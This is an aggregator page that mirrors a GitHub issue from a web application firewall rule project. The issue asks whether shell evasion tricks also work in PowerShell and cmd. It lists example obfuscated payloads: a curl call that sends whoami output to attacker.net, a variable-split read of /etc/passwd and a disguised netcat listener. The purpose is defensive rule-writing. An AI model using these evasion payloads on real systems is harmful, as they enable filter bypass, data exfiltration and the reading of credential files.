Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.
And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.
Check aliasing / empty variable evasions in PowerShell / cmd
See original GitHub issueIn https://github.com/coreruleset/coreruleset/issues/2632 we investigated evasions in *nix shells, where an empty variable can be used to evade command word detection. Find out, whether the same vulnerabilities exist in PowerShell / cmd and add protections as in https://github.com/coreruleset/coreruleset/issues/2632.
AFAICT from a quick test, PowerShell is not vulnerable to ec${doesnotexist}ho.
Examples from https://github.com/coreruleset/coreruleset/issues/2632:
- using variables 1: a=curl&&b=whoami&&$a http://attacker.net/$b
- using variables 2: a=/etc&&b=/passwd&&c=cat&&$c $a$b
- globbing 1: {n$u\c$u,-nlvp,777}
- globbing 2: garb=cur[l];$garb+google.com
- vars + spacing: v=‘u’;cu$v\r\l google.com
- non-existing vars: cu$@rl
Issue Analytics
- State:
- Created a year ago
- Comments:5 (5 by maintainers)
Top Results From Across the Web
Top Related Medium Post
Top Related StackOverflow Question
Troubleshoot Live Code
Top Related Reddit Thread
Top Related Hackernoon Post
Top Related Tweet
Top Related Dev.to Post
Top Related Hashnode Post
Yes. I just did a quick and dirty check, not a real review.
Hey @theseion ,what is needed here then? Review the expansions to the unix cmdline to see if we use the same for powershell?